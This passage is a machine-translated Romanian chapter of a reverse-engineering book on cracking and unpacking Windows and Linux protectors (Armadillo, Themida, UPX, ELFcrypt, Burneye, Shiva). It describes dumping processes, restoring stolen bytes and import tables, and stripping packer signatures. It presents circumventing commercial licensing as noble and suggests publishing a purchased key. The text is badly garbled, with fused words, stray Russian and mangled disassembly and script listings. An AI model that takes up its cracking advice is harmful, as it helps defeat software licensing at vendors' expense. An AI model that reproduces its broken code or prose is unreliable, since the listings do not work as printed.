noul său tastaturăsofisticată, mouse sau alt dispozitiv?Așadar, setwindshookex pentru toată nepretenția sa este o alegere destul de bunăpentru un hacker!Cel mai radical mod de a introduce în spațiul vizat al altcuiva este editarea bibliotecilor de sistem,cum ar fi kernel dll sau user dll Puteți guverna atât pe disc, cât și în memorie, dar în ultimul caz, protecțiapoate expune cu ușurință faptul invaziei printr -o simplă comparație a bibliotecilor de sistem cu imaginea lor După ce afost introdus în biblioteca de sistem, nu uitați să ajustați cantitatea de control în re-descărcare, altfel Windows NTva refuza să o încarce Acest lucru se poate face atât folosind instrumente PE, cât și utilitatea Recuild exe, care faceparte din SDK Cel mai bine este introdus în funcțiile Arch cauzate de codul de pornire al aplicației originale(GetVersion, GetModuleHandlea etc ), determinând procesul „acest lucru” cu funcția GetCurrentProcessid sau de conținutulfișierului Această din urmă opțiune este mai fiabilă, deoarece funcția GetCurrentProcessid poate fi interceptată deprotecție, care va fi foarte „surprinsă” dacă GetVersion Ari-funcția este interesată în mod neașteptat deidentificatorul procesului curent Pentru a evita efectele secundare, trebuie lansat un astfel de amortizor Pe sistemul de operare „evidențiat”, special conceput pentru experimente barbare și, de obicei, lucrează sub o mașinăvirtuală precum Bochs sau VMware O protecție proiectată corect și implementată corespunzător ar trebui să împiediceutilizarea ilegală a programului, dar nu are nici un drept moral, nici legal de a interfera cu utilizatoriilegali Pentru a invada sistemul de operare, a nu face modificări autorizate de către nimeni - aceasta este și mai mult oîncălcare flagrantă a drepturilor utilizatorului Versiuni recente ale Temida și Passport software se apropie îndeaproapede rute Un pic mai mult și se vor transforma în viruși reali, a căror creare este persecutată de lege Prin urmare,amortizarea programului de la banda de rulare nu trebuie interpretată ca hacking, ci ca eliminarea componentelor răuintenționate care împiedică funcționarea normală a sistemului informațional, care este destul de nobil!Dirty TricksPackagers Normal (UPX, PKLite, PE-Compact) comprimă fișierul executabil fără pierderi, iar după finalizareadespachetării, acesta revine la tipul său original, ceea ce face procesul de eliminare a sarcinii banale Protectorii, înefortul de a consolida protecția, merg adesea la un pas destul de riscant - ei „ușor” fac un fișier procesat cu unastfel de calcul, astfel încât acesta să poată funcționa doar sub banda de rulare, iar după eliberarea de ea, acesta vadeveni non - viabil Oamenii de acest tip se numesc „grămezi”, iar acesta este dintr -un motiv!Orice intervenție într -unfișier ambalat este o sursă potențială de eșecuri și erori critice care otrăvesc viața nu numai pentru hackeri, ci șiprin utilizatorii care au abandonat legea Trebuie să scăpați de „grămezi” cu orice preț, așa că nu ne vom răni să lecunoaștem mai bine Furtul de octeți cu OER este cel mai simplu și răspândit truc folosit chiar și în astfel deprotectori inofensivi, precum, de exemplu, asprotect Esența acestei metode constă în lupta GPAV cu pungile din pecare pachetul „fură” mai multe instrucțiuni din punctul de intrare inițial, le păstrează în „cache” (eventual într -oformă deghizată sau criptată) și după finalizarea celor Dezvoltare, emulează executarea octeților furați Cel mai adesea,stiva este folosită în acest scop (și apoi octeții furați devin de obicei operanți de instrucțiuni de apăsare), este mairar folosită de efectele directe asupra registrelor și memoriei (în timp ce instrucțiunile furate sunt transformate înpseudo -cod și nu sunt evidente nicăieri) Concluzia este că la punctul de intrare a imaginii neplăcute a octețilororiginali nu mai este, iar groapa eliminată devine nefuncțională Spre fericirea noastră, marea majoritate a programelorîncepe cu codul de pornire, care face parte din biblioteca de execuție (RTL) furnizată împreună cu compilatorii Folosind„coada” rămasă a codului de pornire, putem identifica cu ușurință compilatorul și restabili octeții furați dinbiblioteca sa Dacă acest compilator nu este la dispoziția noastră, primii câțiva octeți ai codului de pornire în din cazuri sunt destul de previzibile și de multe ori pot fi restabilite independent Desigur, pentru aceasta trebuie săaveți experiență cu diverse RTL Apropo, IDA Pro recunoaște compilatorul tocmai de primii octeți ai codului de pornire,iar dacă acestea sunt absente sau distorsionate, mecanismul de flirt nu va funcționa, ceea ce înseamnă că vom rămânefără numele funcțiilor bibliotecii și Procesul DizAssemble va dura mult mai mult timp P gunoi polimorfic în OER În locsă fure octeți cu OER, unele trepte preferă modificarea codului de pornire, diluând instrucțiuni semnificative cu gunoipolimorf fără sens Acest lucru nu afectează performanța depozitului de fotografiere, dar mecanismul de flirt, forțându-ne să curățăm gunoiul polimorf sau să determinăm versiunea compilatorului „peephole”, încărcând semnătura de mână (IDAPro permite) N adaptoare din tabelul de import la grămadă Bursa Temida folosește o tehnică destul de pachet carerespectă serios restaurarea tabelului de import Adresele directe ale funcțiilor Ari sunt înlocuite cu adaptoare pentruzona de memorie, evidențiate de VirtualAlloc (adică o grămadă), care implicit nu se încadrează în groapă, deci trebuiesă restabiliți importurile manual Acest lucru nu este dificil, dar obositor, căutăm apelurile ari-funcțiilor care duc lao grămadă (că este o grămadă de și nu altceva, puteți determina pe hartă), păstrăm memoria corespunzătoare a memorieicorespunzătoare Regiunea corespunzătoare a memoriei, eliminăm adaptoarele, înlocuindu -le cu adrese reale După aceea,începeți reconstructorul de import sau un alt utilitar cu un scop similar Cu toate acestea, nu este totul!Acesta estedoar inceputul!Pe lângă crearea de adaptoare, unele funcții sunt copiate de întregul protector!Mai multe informațiidespre această tehnică pot fi citite în a doua ediție a „Tehnologiei și filozofiei atacurilor hackerilor”} (a se vedea„Punctele de oprire pe WN ARI și opoziția față de ei”, "Copierea ARI - Funcții întregi") N înlocuire JX cu emulare ulterioară Când programele „crăpate” de la banda de rularearmadillo, cel mai dificil este restaurarea codului inițial al programului Protecția Dizassembled fișierul procesat,găsește tranziții condiționate și necondiționate în acesta, înregistrează comanda OPP peste ele, iar tranziția în sineeconomisește în tabelul său de tranziție internă Procesul serverului interceptează excepția excitată de instrucțiunileInt OP, privește de unde a venit, elimină tranziția corespunzătoare acestei adrese de la tabel și își emulează execuțiafolosind manipulări aritmetice cu steagul Flags Iată cele trei principale principale Dezavantaje ale acesteisoluții: • În primul rând, nu există nicio garanție că protecția DizAssembled programul procesat și nu confundătranziția cu o altă echipă • În al doilea rând, emularea necesită timp, reducând semnificativ performanța • În altreilea rând, acest lucru încă nu salvează de la hacking!Dezasamblat de emulatorul de tranziție (și nu este dificil dedatsmembling) și găsind tabelul de tranziție, hackerul în o chestiune de Chris Kaspersky „Tehnica și filozofiaatacurilor hackeri-note ale fumului” -m Solop-Presps ", Aceasta înseamnă că, în explicita, forma tranzițiilornu este stocată nicăieri! Partea V Practic Codicopaging timp de un minut va scrie un script pentru Ida RGO sauOllydbg, care delexează toate INTA H și restabilește tranzițiile originale Există Chiar și un cracker armadillo semi-automatizat scris în doi zei de despachetare - Inferno și Dragon (http: // www wasm ru/baixado php?mode=tool&id= ),în următoarele versiuni, care i se promite un despachetare automată completă și decontaminarea Armadillo Mașinavirtuală este profund „impresionată” în banda de rulare, apoi rupe apărarea fără a „ucide” în același timpCâștigând,devine aproape imposibil, deoarece este imposibil și direct pentru codul DizAssemblit Byte Cel puțin, pentru aceastaeste necesar să se ocupe de algoritmul de operare a mașinii virtuale și să scriem un modul de procesor special pentruIDA RGO sau propriul dvs Dizassembler Aceasta este o lecție de consum de timp care necesită mult efort și timp dinpartea hackerului Trebuie avut în vedere faptul că codul de octeți al mașinii virtuale din următoarele versiuni alebenzii de rulare poate fi schimbat, iar modulul de procesor scris anterior/Dizassembler va fi impropriu Aceasta este ceamai persistentă protecție a tuturor celor care există astăzi, dar nu uitați de două lucruri: • În primul rând, dacăbanda de rulare devine populară, iar noile sale versiuni sunt rare, atunci crearea de module de procesor devinejustificată din punct de vedere economic și încep pentru a rupe protecția tuturor Dacă noi versiuni apar aproape zilnic,este puțin probabil ca dezvoltatorul de rulare să aibă suficient timp pentru restructurarea radicală a mașiniivirtuale În această situație, el trebuie să se limiteze la modificări minore ale octetului, care se revarsă înmodificări minore în modulul procesorului, iar banda de rulare va continua să se rupă • În al doilea rând, hackerulpoate „rupe” mașina virtuală de pe banda de rulare, fără să se aplece complet în subtilitățile de interpretare a coduluide octeți, confirmând încă o dată teza cunoscută că totul poate fi rupt în timp Legături utile P „Tehnologii modernede amortizare și protecție împotriva acesteia” - un articol excelent de la creatorul Extremedumper, dar, în acelașitimp, povestind despre cum sunt protejați protectorii de îndepărtarea Dump și explicând cum să ocoliți aceste protecții(în Limba rusă): http://www wasm ru/article php articlesdumping □ „Pe Packers pentru ultima dată” - o lucrarevoluminoasă creată de echipa celor mai buni hackeri interni conduși de legendarul Volodya (Volodya) și care acoperătoate aspectele activității pachetelor, protectorilor și sistemului de operare în sine (în rusă ): http: //www wasm ru/articol php articlespacklast (prima parte) și http://www wasm ru/article php articlespackers (a douaparte) Pacificors de fișiere executabile în Linux/BSD și lupta împotriva lor majoritatea programelor UNIX suntdistribuite în textele originale, dar numărul de produse comerciale cu un cod închis este în creștere constantă Adesea,astfel de programe se răspândesc într -o formă ambalată, care nu numai că împiedică analiza, dar reduce șiproductivitatea și agravează compatibilitatea cu diverse clone UNIX Vom arăta pe exemplul Upx, Elfcrypt, Bumeye șiShiva, deoarece cooperativele sunt eliberate de pachete În Windows, pachetele de fișiere executabile sunt utilizate pescară largă și au format o nișă de piață extinsă, unde bani uriași care alimentează întregi firme se învârt Suntimplicați specialiști cu înaltă calificare, care creează mecanisme de protecție puternice, luptă împotriva lupteiîmpotriva dezvoltării pachetelor care necesită consolidarea întregii comunități de hackeri Capitolul Lupta împotriva pachetelor din în UNIXSituația este aproximativ așa: Există deja nevoie de pachete Multe firme comerciale ar dori să elibereze porturileînchise ale produselor lor sub UNIX, protejându -le în detaliu, dar piața de protecție nu a avut încă timp să sedezvolte Din acest motiv, o duzină de pasionați care repetă trucurile primilor tineri MS-DOS sunt angajați îndezvoltarea de ambalatori Dintre toți ambalatorii de acest tip, numai Shiva este o încercare de a face un salt calitativînainte, aproape de protectorul pașaportului software (fostul Armadillo) Totuși, aceasta este exact ceea ce l -adistrus Pe multe sisteme Linux/BSD, Shiva provoacă o eroare de eroare de segment Crearea unei protecții fiabile, lansatăîn mai multe versiuni a Linux, este aproape o afacere fără speranță, iar dacă vă amintiți BSD și nuclee experimentaleprecum Hurd, atunci nici nu puteți continua la programare În același timp, slăbiciunea mecanismelor de protecție estecompensată de absența unui instrument de hacker demn, astfel încât chiar și cea mai simplă protecție este o mareproblemă, făcând din programele sub UNIX o sarcină destul de non -trivială!Dar o vom rezolva!Începând cu cei mai simplipacheți și dobândind abilități tactice și instrumentele necesare în luptă, în cele din urmă, putem lupta cuoricine!Pachetele și performanțele Când porniți un fișier cu un pachet de dischetă sau CD-ROM accelerează efectivsarcina, deoarece volumul de date semnificativ mai mic este transmis fizic, iar viteza acestor dispozitive nu estecomparabilă cu viteza procesorului În acest caz, timpul de despachetare poate fi complet neglijat, iar câștigul va fiegeric egal cu gradul de ambalare Când porniți de la hard disk, se observă situația opusă Un fișier ELF lipsit deimportanță este proiectat direct în RAM și numai pagini modificate ale secțiunii de date sunt înlocuite în fișierulswap Când porniți câteva copii ale unui fișier ELF neimpozit, memoria fizică nu apare În schimb, sistemul de operareafișează pur și simplu paginile încărcate anterior în spațiul țintă al procesului Dacă împachetați fișierul, atunci cândîncepeți, modifică toată proiecția sa, ceea ce înseamnă că, cu o lipsă de memorie fizică, sistemul de operare nu va maiputea „arunca” paginile aparținând acestuia, deoarece nu mai există niciunul Oportunitatea de a le repeta de pedisc Prin urmare, trebuie să ne implicăm în deplasare în Swap Cu o singură lansare a programului, acest lucru nu esteatât de vizibil, dar lansarea multiplă a unui fișier ambalat duce la o încetinire semnificativă a boot -ului Gândiți-vă, pentru că, în loc să contactați paginile deja încărcate, sistemul de operare trebuie să se despacheteze de fiecaredată!Din motiv, nevoile de memorie RAM sunt în creștere - mai multe copii ale unui program ambalat nu pot utiliza încomun pagini comune de memorie fizică Pentru a -l încheia, majoritatea pachetelor necesită memorie suplimentară pentru astoca declarații intermediare de despachetare La utilitățile lansate de mai multe ori (de exemplu, faceți), diferențadintre un fișier ambalat și lipsit de importanță este pur și simplu colosală!Prin urmare, concluzia: odată cu aparițiahard disk -urilor și a sistemelor de operare multitasking cu o organizare a memoriei de pagini, ambalarea fișierelorexecutabile și -a pierdut complet sensul și a început doar să dăuneze Acum merită să împachetați (sau mai bine zis,criptați) fișierul merită doar pentru a complica analiza sa Dar merită făcut?Hackerii vor păstra în continuareprotecția, deoarece niciunul dintre protectorii existenți nu a scăpat de această soartă, dar utilizatorii legali scadproblemele de performanță și de compatibilitate Acest lucru este valabil mai ales, având în vedere că viitorul aparțineîncă software -ului deschis După cum arată practica, pe măsură ce crește, orice industrie vine inevitabil la standardedeschise - ia cel puțin un automobil sau electronică În zorii dezvoltării electronicelor, producătorii de frunte auașezat fiole cu acid în înregistratoarele radio/bandă, astfel încât, la deschiderea carcasei, toate microcircutele aufost distruse Puțin mai târziu, în același scop, a început să se folosească rășina epoxidică Astăzi, schemele principalesunt distribuite tuturor centrelor de servicii sau sunt acordate unui acord de dezvăluire pur formal PARTEA VPRACTIC COPPERING ELF-CRYPT ELF-CRYPT este cel mai simplu codificator (nu un pachet) de fișiere ELF create de un studentindian poreclit Junkcode și distribuit în textele sursă: http: / www infogreg com/source-code/ publiclic-domain/elfcrypt -vl html Consideră secțiunea de cod (care, de regulă, este secțiunea Text) și încorporează undecodificator minuscul în forma originală în fișierul ELF Nu Conține orice tehnici anti-folk și este remarcabil de despachetat sub un debugger precum GDB sau ALD (listarea ) ;Listarea Codul dizAssembled al decodificatorului introdus de Elfcrypt în fișier (Cum arată în Hiew):EntryPoint DC: EB JNPS E ;Mergem la decodificator DF: PUSH ES;\ gunoi stânga df:c ???;/ traducător de asamblare e Pushad;Salvăm toate registrele din stivă e : c PushFD;Păstrămsteagurile în stivă E : BEC MOV ESI, C ;Începutul decriptatului e :;fragment E : BFE MOV EDI, ESI;Edi: = edi e :;(decriptare la fața locului) E : B MOV ECX, ;Numărulde cuvinte duble e :;Decriptarea DPPI EE: BBBD CC MOV EBX, CC BD;Cheie de decriptare f : adlodsd;Citim următorul f :;Cuvânt dublu :„ START PROCE LAY XOR EBP,EBP XOR %EBP, %EBP глава //instrucțiunile mici ale mașinii ratate # Text: D Pushh Offset Main : X/I $ PC x D : PUSE x # Text: DC E CF FF Call libc start Main : X/IAMAIN : X/IAMAIN :Apelați x b ;Dar codul de pornire provoacă funcția bibliotecii libc start main ,;Deoarececompilatorul nu știe încă adresa sa reală;El introduce adaptorul la secțiunea PLT care conține adaptoare;La secțiunea got umplută cu un bootloader dinamic # Plt: v libc start main proc lângă # plt: b ff do grrp ds: off d : x/i pc x b : gnp * x d ;IDA Pro a afișat corect PLT Peregraph care provoacăo funcție;Pointerul la care se află într -un cuvânt dublu la D H # GOT: D E OFF D DD OFFSET LIBC START MAIN : X/I $ PC x B : Pushh $ x : x/i $ PC x BB : GIRP x ;Și aici discrepanțele au început deja ;IDA Proasigură că deplasarea funcției libc start main este localizată aici;În timp ce debuggerul arată că există un codspecial aici;PUSH H/GMP H Să vedem ce va apărea IDA Pro la H # Plt: ???????DD DUP (?) : X/I$ PC x : xor %ebp, %ebp;Cod de pornire, care înseamnă x c : pop %eSI;Aplicația a fost dejadespachetată x c : mov %esp, %ech x c : și $ oxfffffffo, %esp x c :push %eax x c : push eAx x c : push %: Push : Push %edx x cb : împingeți x x d : apăsare x b x d : Push %ecx x d : %ESI x D : Împingeți $ x x dc : Apelați x b x el : HLT END OF ASSMBLER DUMP Partea V Capacitatea de cod practic ca opțiune, după ce a studiatcodul de despachetare, puteți scrie un script pentru IDA Pro, care efectuează singur dezambat Această abordarefuncționează bine cu decodificatori/ despacheri simpli, iar în acest caz, scriptul se potrivește doar cu câteva rânduri(listarea ) Listarea Un script pentru IDA Pro, descifrarea unui program ambalat folosind Auto A, X;for (a = x c ; a pentru a converti anterior prin instrucțiuni DizAssemble într -un flux de octeți, apoi tasta pentru a converti dinnou fluxul de octeți într -un cod DizAssemble O altă metodă de contracarare a pachetelor este de a conecta (atașat) laun proces deja avansat (după ce Wrappingman a despachetat deja totul ) În GDB, acest lucru se face după cum urmează:GDB -~ PID = , unde PID este un identificator al procesului rupt, care poate fi găsit folosind comanda PS -A Cutoate acestea, aceasta nu este cea mai bună modalitate, deoarece vom invada programul după inițializarea grămezii și astructurilor dAnneele și groapa de lovitură pot fi ineficiente În plus, din cauza jocurilor cu extern și inconsecvența start, punctul real de intrare, amortizoarele UNIX existente nu pot reconstrui fișierul ELF, primind o eroare desegmentare Este adevărat, puteți utiliza PD UTIT (este considerat mai detaliat în pachetul UPX), indicând cheia „magic”- , care comandă să nu atingă secțiunea Got În acest caz, fișierul primit de la dump va provoca o eroare de segmentare,dar va fi descifrat complet, ceea ce (teoretic) ar trebui să simplifice foarte mult dizasarea Cu toate acestea, înpractică, din cauza lipsei numelor simbolice ale funcțiilor bibliotecii, analiza riscă să se transforme în tortură Dacănu trebuie să eliminați depozitul și este destul de ușor să „vedeți” ce face programul ambalat, puteți utilizautilitatea Trace, sesiunea de lucru cu care este prezentată în lista După cum puteți vedea, Elfcrypt nu încearcădeloc să o reziste libc start mam( x c , , xbffffb , x , x printf(Oxbffffac , x a , xbffffad , x b, x c c ) = hello, world! gets(OxbffffacO, x a , xbffffad , x b, x c c ) = OxbffffacO + ++ ieșit (Status ) +++ În plus față de funcțiile cauzate în sine, Trace reflectă șiadresele de retur (în listare sunt evidențiate în fontul semi -fat), care ne permite, setând hardware -ul Osganov peele, pentru a rupe în orice punct al programului deja despachetat! În general, nu viață, ci frumusețe! Cu toate acestea,să nu uităm că Elfcrypt nu este nici măcar un ambalator, ci un meșteșug de studenți experimental Să vedem cum putemface față programelor mai complexe de Capitolul din pachetele UPX este unul dintre cei mai mulți pacheți anticicreați de cei trei Markus F X J Oberhumer Magicieni, Lâszlo Molnâr și John F Reiser, care susține numărul record deformate de fișiere (de la Amiga la UNIX) și descifrarea abrevierii sale ca fiind ca fiind ca fiind abrevierea acestuiaca „Ultimul PAcker pentru executabile " Versiunea nouă, împreună cu textele originale, pot fi descărcate de pe site -uloficial al proiectului: http://www upx org/ sau de aici: http://upx sourceforge net/ UPX nu are cod de protecție și nucontracara nici depangarea, nici DizAssmit Mai mult decât atât, conține chiar și un despacker construit, pentru carelinia de comandă -d cheie „este responsabilă” Din punct de vedere comercial, UPX este benefic prin faptul că fișiereleambalate de el funcționează în aproape întregul spectru al sistemelor asemănătoare cu unix Cu toate acestea, prezențaunui ambalaj construit îl face complet inutil pentru programele suturate Deși totul depinde de modul de a privi„disponibilitatea textelor sursă Modificați ușor structura fișierului ambalat, astfel încât unpackerul „nativ” nu va mai putea lucra cu acesta Cel maisimplu lucru pe care îl puteți face este să ștergeți semnătura Upx la sfârșitul fișierului, atunci UPX nu va putearecunoaște fișierul ambalat, iar unpacker -ul construit va refuza să lucreze cu acesta (prospectul ) Listarea Semnătura upxi localizată la sfârșitul fișierelor ambalate v : FF | D OS F F E S T $ UPX!/¥ P-PESHM B A : B C F | UE D *H- |SMOS B ar ooooizvm: J și A vor efectua un mic experiment Vom deschide un fișier ambalat în orice editor Hex și vom scrieîn partea de sus a semnăturii UPX ceva, de exemplu: (listarea ) , Listarea Semnătura cu iarbă v : FF | D OS F F E S T $ BB >? P "PESHM B A : B C F | UE D PH- | SMOS IIAR OOOO-VISV: J și și fișierul nu va înceta să înceapă, daracum UPX refuză în mod clar să-l despacheteze (listând ) = Listarea UPX-ul încorporat în unpacker nu a pututdespacheta fișierul cu rootul de semnătură cauciucat@ [upx- - ] inux]# /upx -d elinks Ultimate Packer pentruExecutables Copyright (C) , , , UPX Markus Oberhumer, Laszlo Molnarși John Reiser th Dimensiunea fișierului Nume Format Upx: ELINKS : Notacked ambalat de Upx Nepus fișiere Deoarece UPX nu utilizează LIBC și funcționează prin interfața apelurilor de sistem, bibliotecile dinamice suntconectate numai după finalizarea despachetării Și acest lucru înseamnă că prin instalarea punctului de oprire pe funcție DL MAP OBJECT DEPS (), vom intra în programul deja despachetat Partea V Codicopagingul practic va funcționa, deasemenea, ca atașament (atașat) al depanatorului la procesul activ Dacă doriți, puteți obține nu numai o groapă „brută”,ci și un fișier ELF gata să funcționeze Din păcate, nu există analogi directe ale celebrului Dumper Procdump sub UNIX(echipa generată-core-file GDB creează un fișier potrivit pentru Dizassmit, dar, din păcate, nu încep), dar uneleeforturi în această direcție sunt deja făcute Utilitatea PD, al cărei cod sursă, echipat cu o explicație a principiilorlucrării sale, este publicat în de numere de phr ak (http://www phrack org/issues html?issuew manual Cel mai tristlucru este că PD nu poate elimina depozitele de programe efectuate în cadrul debuggerului Dar în lumea Windows, hackeriifac exact asta!Ei găsesc punctul de intrare original de către debugger, după care folosesc amortizorul procdump sauinstrumentele sale analogice mai moderne Cu toate acestea, există o oportunitate de a se deconecta de la procesulcomandamentului detașamentului și, înainte de a părăsi debuggerul, el va fi într -o stare „înghețată”, care vă permitesă vă păstrați în mod liber depozitele În articolul menționat „Process Dump și Reconstrucție binară” există un linkcătre site -ul de bază al proiectului (http://www reversing org/), dar nu există încă versiuni noi Sesiunea utilitățiiPD este prezentată în lista Lister Eliminarea gropii cu reconstrucția ulterioară a rootului fișierului ELF@ [src] # /Demo;Rulați procesul ambalat spre execuție root@ [src]# ps -a;Determinați -l pid Pid tty Time CMD PTS/ : : DEMO PTS/ : : PS root@ [src]# /pd -o aruncat ;Дампиck пoцесс в файл, Pd VI POF Descărcați ultima versiune de la: http://www reversing org Distribuție sursă pentru testare Efectuarea căutării doar metoda paginilor implementată în această versiune la pagesz Situat la: xBFFFFBC Adunațiinformații despre proces și reconstruire: -Cegmente de program descărcabile, antet ELF și dimensiune minimă Analizarea segmentului dinamic Fixarea agresivă Tabelul global OBGECT VADDR: x Daddr: x FOFFSET: x * PLT NERESOLVED! Secțiune Anteturile reconstruiește aceste distribuții nu reconstruiesc fișierul deeconomisire a anteturilor de securitate: finisat Root@ [src]# /dumped;Utilitatea PD a absolvit procesul deamortizare ;Rulați procesul rezultat la execuție Dar Utility TRACE nu va funcționa, deoarece are nevoie de dynsymsau Dynstr, care sunt în fișiere, Upx ambalat, nu!Cu toate acestea, așa cum s -a demonstrat doar, acest lucru nu împiedică încă hacking -ul UPX Capitolul Lupta Burneye Burneye Burneye, primul Unix-Salesman, care susține rolul unei benzi de rulare, a fost creat de untânăr hacker de scute, care este și un „grup TESO”, care lucrează în prezent la Proiectul Linice, un analog al SofticeUnder sub Unix Burneye este o rundă experimentală care se răspândește liber La început, textele sale inițiale nu au fostdisponibile, dar apoi (sub presiunea publicului), - % din volumul total al codului a fost stabilit, iar apoi întregulproiect este în întregime Îl puteți descărca de pe site -ul http://www packetstormsecurity org/ Arhivahttp://packetstorm linuxesecurity com/groups/teso/burneye-l -linux-static tar gz conține o versiune compilată careoperează sub Linux și oferind suport parțial al BSD (lucrări instabile) În arhivăhttp://packetstorm linuxesecurity com/groups/teso/ Burneye-trippted tar gz se află % din textele originale și maimulte articole cu idei noi, dar nu realizate pentru consolidarea protecției și arhiva http: // //pachetstorm linuxsecurity com/ Grupuri/TESO/BURNEYE- -SRC TAR BZ conține toate textele inițiale Benul de rulareștie să cripteze fișiere în funcție de algoritmii SHA și RC , necesitând o parolă de la utilizator lapornirea Teoretic, puteți hack programul fără a cunoaște parola Criptografia nu stă nemișcată și se pot găsi paroleadecvate aici: http://byterage hackaholic org/source/unfburnhell oc tar gz) În practică, este mult mai ușor să cumpărațio singură copie de licență, apoi să puneți cheia pentru afișarea publică Pentru a împiedica acest lucru să se întâmple,banda de rulare este inerentă posibilității de „legare” de echipamentul utilizatorului (amprenta astfel dedigitală) Acesta este un subiect destul de interesant, care merită o considerație separată și, cu siguranță, va fi luatîn considerare într -una din cărțile ulterioare Între timp, ne concentrăm exclusiv pe despachetare Burneye este formatdin multe decripții investite unul în celălalt, generat de arbitrar Totuși, acest lucru nu împiedică urmărirea, deoarecedecodificatorii sunt implementați ca proceduri Tehnicile de antidizassembler existente coboară la un salt în mijloculechipei și pot fi ușor neutralizate atât în ​​IDA Pro, cât și în Hiew Întregul protector conține o singură tehnică anti-delanding care împiedică urmărirea sub GDB și sub un debugger integrat în IDA Pro (listarea ) - Listarea Coddezasamblat, care demonstrează singura tehnică anti -delanding implementată în Burneye v * " " "" ", V mm->start code -t ; / * apelant == Burneye ??? * / if ((CodePtr ” ) == x ) printk (" semnătură x găsit'w);Dar totul devine imediat clar dacă te uiți la fișierul procesat de o benzi de rulare a Burnyy (listarea ) După cum puteți vedea, banda de rulare are în sine în adrese destul de necaracteristice, iar Dumper compară purși simplu -seniorii octeți ai adresei care provoacă funcția brk () Listarea Фрагмент файла, упакованногопротектором Bumeye : FF push d, [ ] В: С pushfd С: pushad D: B D mov ecx,[ ] : Е А jmp (D После запуска упакованного файла на диске автоматически образуется распакованный файл /burnout, carenu mai este legat de o mașină de utilizator Acest fișier poate fi depanat liber sau dizassemble pentru plăcerea sa Descărcarea modulului de rezident din memorie este realizat de comanda RMMOD Burdump, dar nu vă grăbiți să vă despărțițide el ! După ce am finalizat ușor textul sursă, vom putea să -i despart de pe alții protectori (când apar), și nu doarun Burneye Dumper al nivelului nucleului este un lucru! Aceasta este o armă reală, care este foarte dificil de făcut cua face cu La nivel aplicat! (Cu toate acestea, Burneye face față cu ușurință cu PD menționat anterior ) Astfel, victoriaasupra lui Burneye poate fi considerată completă și ochiDimalical Shiva este un protector foarte ambițios creat de doiguru (Neel Mehta și Shaun Clowes) și s -au prezentat la Conferința Black Hat, care a avut loc în Asia în Textele depornire nu sunt dezvăluite, iar ansamblul binar finalizat poate fi descărcat de pe site-ul dezvoltatorilor(http://www secutureritity com au/archives/shiva- tar gz) și de la Black Hat: // server (//blackhat com/presentations/bh-usa- /bh-us- -mehta/bh-us- -hiva- tar) În același timp, versiunea de la Black HatServer este mai proaspătă, ceea ce duce la anumite gânduri Acolo, pe serverul Black Hat, puteți găsi texte ale uneiprezentări multimedia de la atât dezvoltatori, precum și o prezentare în format PDF:http://www blackhat com/presentations/bh-usa- /bh-usus - -MEHTA/BHH -US- -MEHTA PDF șiHTTP://WWW BLACKHAT com/presentations/bh-asia- /bh-asia- -halvar pdf Dezvoltatorii au implementat o criptare dinamicăanti -șabloane, mai multe niveluri, emulând unele instrucțiuni ale procesorului În general, s -a dovedit aproapeArmadillo, doar sub Linux, dar dacă Armadillo funcționează cel puțin cumva, atunci Shiva pe multe sisteme duce laeroarea de eroare de segment (Fig ) Testat în mod specific: Knoppix cu nuclee de / Partea V Cordarea practică a cordonului și s u s e cu un nucleu de , iar testarea a fost efectuată atât sub VMware, cât șipe mașina „live” cu Procesor AMD Athlon- Orez Eroarea de eroare de segmentare invariabilă atunci cândîncercați să porniți variabilele de bandă Shiva ale cheilor de execuție Shiva ale deplasării/codului SHIFROBLOCK alExplusiei Explusion Ont și instrucțiuni emulate ale orezului de tip - de tip - Structura fișierului Shivaeste, prin urmare, toate informațiile furnizate mai târziu în această secțiune au fost obținute exclusiv prinDizassMittering și Debugging the Tread Structura fișierului ELF protejat de Shiva este prezentată în Fig Săîncepem cu depanarea, deoarece sub Linux aceasta este cea mai urgentă întrebare Sistemul de operare oferă bibliotecaPTRACE, care este utilizată de GDB, precum și de copleșitor Majoritatea celorlalți debuggeri, inclusiv debuggerul integrat în IDA Pro, ALD (Debugger Language de Assembly), etc Problema este că Biblioteca PTRACE nu este de neegalat, iar acest lucru se estompează că programul care este deja subdepanare, debug nu Not !Acest subiect este dezvăluit mai detaliat în capitolul , „Caracteristici de depanare în UNIXși Linux” GPAVA Lupta împotriva pachetelor Shiva aprofitat de acest fapt, dând naștere unei filiale de el însuși, care s -a apărat în mod fiabil de la urmărirea și de laa numi PTRACE ATTACH, deoarece funcționează și prin PTRACE!Găsirea unui debugger convenabil care ocolește PTRACE s -adovedit a fi surprinzător de dificilă pentru sarcina Problema a fost agravată de faptul că, pe lângă aceasta, Shivarecunoaște steagul capcană, analizând bitul de urmărire în registrul procesorului EFLAGS și controlează, de asemenea,parametrii de sincronizare Căutarea descoperă doar cimitire de proiecte abandonate Dintre toate debuggerii disponibile,doar Linice (http://www linice com/) a venit pentru a rezolva problema și chiar atunci doar în modul VGA Hackerul ChrisEagle a mers invers și, în aceeași conferință, a arătat cum să neutralizeze eficient Shiva În loc să caute debuggericare lucrează ocolind PTRACE, a dezvoltat un emulator de procesor x , realizat sub forma unui plugin pentru DA RGO șidistribuit în textele sursă: http://sourceforge net/projects/ida-x emu Cu toate acestea, rețineți că necesită IDA SDKși nu toată lumea are acest produs Textul unei prezentări multimedia cu o descriere a metodologiei de hacking se află peserverul Black Hat: http://www blackhat com/presentations/bh-federal- - -eagle/bh-fed- -eagle PDF și un set deutilitate pentru hacking (inclusiv unpacker automat și mai multe scripturi utile pentru IDA RGO, simplificareadecodării) sunt în fișierul vecin: http://www blackhat com/presentations/bh-federal- / bh-federal -eagle/bh-federal- -eagle zip Acum să trecem la decodare Pentru a rezista barajului, chiar și la nivelul nucleului, Shivafolosește decodarea dinamică la cerere Pagini neutilizate sunt în prezent umplute cu octeți de CCH, care suntinstrucțiunile INT H Aceste instrucțiuni transmit controlul procesului de proces-mamă atunci când încearcă să leîndeplinească, ceea ce semnalează nevoia de a le decripta Decodarea este realizată de „pomparea” octeților lipsă dinstocarea „backup” Desigur, acest truc funcționează doar cu codul și nu funcționează cu datele și trebuie să fiedescifrate cu un decodificator static În plus, Shiva înlocuiește instrucțiunile de apăsare, JMP și apeluri pe INTA Hîn blocuri decriptate și emulează implementarea acestora Totul este foarte simplu Shiva păstrează un tabel special înmemorie cu adrese ale instrucțiunilor înlocuite, iar dacă capcana de la execuția int op ajunge la una dintre acesteadrese, mecanismul de emulare este activat În termeni practice, acest lucru înseamnă că, chiar și descifrarea tuturorblocurilor criptate, încă nu vom putea scăpa de Siva RTL (mediu) și vom fi obligați să „tragem” pachetul pentru noiînșine, cu excepția 